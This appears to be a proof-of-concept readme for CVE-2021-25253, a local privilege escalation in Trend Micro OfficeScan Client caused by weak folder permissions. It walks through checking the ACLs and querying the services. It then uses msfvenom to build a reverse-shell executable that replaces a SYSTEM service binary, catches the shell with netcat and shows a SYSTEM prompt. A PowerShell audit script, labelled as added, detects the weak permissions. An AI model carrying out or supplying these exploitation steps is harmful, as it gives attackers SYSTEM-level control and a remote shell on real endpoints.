
CVE-2021-25253 PoC — Trend Micro Apex One Security Vulnerability

Source
Associated Vulnerability
Title: Trend Micro Apex One Security Vulnerability (CVE-2021-25253)
Description: Trend Micro Apex One is endpoint security software from the US company Trend Micro that provides automated threat detection and response. Trend Micro OfficeScan contains a security vulnerability: Trend Micro Apex One, Trend Micro Apex One as a Service, and OfficeScan XG SP1 have an improper access control weakness on a resource used by the service, which may allow a local attacker to escalate privileges on affected installations. Note: to exploit this vulnerability, an attacker must first obtain the ability to execute low-privileged code on the target system.
Readme
<a target="_blank" href="https://img.shields.io/badge/plateform-windows-blue.svg" rel="noopener noreferrer">
    <img src="https://img.shields.io/badge/plateform-windows-blue.svg">
</a>
<a target="_blank" href="https://img.shields.io/badge/version-10.0-yellow" rel="noopener noreferrer">
    <img src="https://img.shields.io/badge/version-10.0-yellow">
</a>
<a href="" rel="nofollow">
    <img src="https://img.shields.io/badge/service-acl-red">
</a>

```bash
#########################################################################
#                                                                       #
#  Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE  #
#  Date: 2023/05/04                                                     #
#  Exploit Author: msd0pe                                               #
#  Vendor Homepage: https://www.trendmicro.com                          #
#  My Github: https://github.com/msd0pe-1                               # 
#                                                                       # 
#########################################################################
```

<h3>Trend Micro OfficeScan Client:</h3>
Versions <= 10.0 ship with incorrect ACL rights on the OfficeScan Client folder, which lets a local user escalate privileges to SYSTEM through the services that run from it. Exploiting this vulnerability does not require any elevated privileges.

<h2>Verify the folder rights:</h2>

```bash
    > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

    C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
                                                         NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                                                         NT AUTHORITY\SYSTEM:(F)
                                                         NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                         BUILTIN\Administrators:(F)
                                                         BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                         BUILTIN\Users:(F)
                                                         BUILTIN\Users:(OI)(CI)(IO)(F)
                                                         CREATOR OWNER:(OI)(CI)(IO)(F)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)
```
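The `icacls` output above shows the weak entry (`BUILTIN\Users:(F)` with `(OI)(CI)` inheritance) by eye. The following PowerShell audit is an added example, not part of the original PoC: it resolves each named service to its binary, then flags any ACE on the binary or its parent folder that grants write-class rights to low-privileged principals. The service names are the two from this write-up; the principal list and the `Win32_Service` lookup are this example's own choices.

```powershell
# Added defensive audit (not part of the original PoC): for each named service,
# resolve its binary path and report ACEs on the binary or its parent folder that
# grant write-class rights to low-privileged principals. A hit on the OfficeScan
# Client folder (BUILTIN\Users:(F)) is exactly the condition shown above.
$LowPrivPrincipals = @(
    'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)
# Any of these rights lets the principal replace, append to or re-ACL the object.
$WriteRights = [System.Security.AccessControl.FileSystemRights]`
    'Write, Modify, FullControl, WriteData, AppendData, ChangePermissions, TakeOwnership'

function Test-ServiceBinaryAcl {
    param([Parameter(Mandatory)][string[]]$ServiceName)
    foreach ($name in $ServiceName) {
        $svc = Get-CimInstance Win32_Service -Filter "Name='$name'"
        if (-not $svc) { Write-Warning "service '$name' not found"; continue }
        # PathName may be quoted and carry arguments; keep only the executable
        # (simplified parsing: quoted path, or text before the first ' -' / ' /').
        $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] }
               else { ($svc.PathName -split ' -| /')[0] }
        foreach ($target in @($exe, (Split-Path $exe -Parent))) {
            if (-not (Test-Path -LiteralPath $target)) { continue }
            $acl = Get-Acl -LiteralPath $target
            foreach ($ace in $acl.Access) {
                $weak = ($ace.AccessControlType -eq 'Allow') -and
                        ($LowPrivPrincipals -contains $ace.IdentityReference.Value) -and
                        (($ace.FileSystemRights -band $WriteRights) -ne 0)
                if ($weak) {
                    [pscustomobject]@{
                        Service   = $name
                        RunsAs    = $svc.StartName
                        Path      = $target
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}

# Audit the two services named in this write-up; no rows means the ACLs are sane.
Test-ServiceBinaryAcl -ServiceName 'tmlisten', 'ntrtscan' | Format-Table -AutoSize
```

Services reported here run as `LocalSystem` from a user-writable path, so the fix is to remove the write-class ACEs for those principals (or reinstall a patched version) and re-run the audit until it returns nothing.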

<h2>Get information about the services:</h2>

```bash
    > sc qc tmlisten

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: tmlisten
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT Listener
            DEPENDENCIES       : Netman
                               : WinMgmt
            SERVICE_START_NAME : LocalSystem
```

OR

```bash
    > sc qc ntrtscan

    SERVICE_NAME: ntrtscan
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT RealTime Scan
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
```

<h2>Generate a reverse shell:</h2>

```bash
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe
```

OR

```bash
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe
```

<h2>Upload the reverse shell to C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe</h2>


<h2>Start listener</h2>

```bash
    > nc -lvp 4444
```

<h2>Restart the service (or reboot the server)</h2>

```bash
    > sc stop tmlisten
    > sc start tmlisten
```
OR

```bash
    > sc stop ntrtscan
    > sc start ntrtscan
```

OR

```bash
    > shutdown /r
```

<h2>Enjoy!</h2>

```bash
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system
```